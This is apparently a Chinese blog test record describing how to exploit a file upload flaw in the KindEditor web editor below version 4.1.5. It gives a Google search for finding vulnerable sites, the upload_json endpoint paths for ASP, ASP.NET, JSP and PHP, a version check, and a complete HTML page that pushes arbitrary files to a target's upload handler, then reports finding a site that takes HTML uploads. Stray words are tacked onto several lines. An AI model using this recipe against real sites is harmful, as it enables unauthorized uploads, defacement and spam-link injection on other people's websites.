最近發現不少網頁篡改與暗鏈都是利用kindeditor編輯器,因而搜了一下kindeditor的漏洞,發現低於4.1.5版本的存在文件上傳的漏洞,能夠上傳txt,html後綴的文檔,許多惡意的文檔貌似都是這樣上傳上去的。php
可是實際測試過程當中還未找到可上傳html的站點,txt文檔卻是能夠上傳。作個測試記錄html
google搜素一些存在的站點 inurl:kindeditorjson
根本腳本語言自定義不一樣的上傳地址,上傳以前有必要驗證文件 upload_json.* 的存在asp.net
/asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php
而後查看版本信息http://www.XXX/kindeditor/kindeditor.jsjsp
版本是4.1.10能夠進行嘗試http://www.XXX/kindeditor/asp.net/upload_json.ashx?dir=file存在有必要驗證文件 upload_json.* 編輯器
/asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php
playload構造測試
<html><head> <title>For TEST</title> <script src="http://www.XXX/kindeditor/kindeditor.js"></script> <script> KindEditor.ready(function(K) { var uploadbutton = K.uploadbutton({ button : K('#uploadButton')[0], fieldName : 'imgFile', url : 'http://www.XXX/kindeditor/asp.net/upload_json.ashx?dir=file', afterUpload : function(data) { if (data.error === 0) { var url = K.formatUrl(data.url, 'absolute'); K('#url').val(url);} }, }); uploadbutton.fileBox.change(function(e) { uploadbutton.submit(); }); }); </script></head><body> <div class="upload"> <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /> <input type="button" id="uploadButton" value="Upload" /> </div> </body> </html>
上傳txt文檔有路徑地址網站
在頁面端訪問google
發現一個能夠上傳html文檔的網站url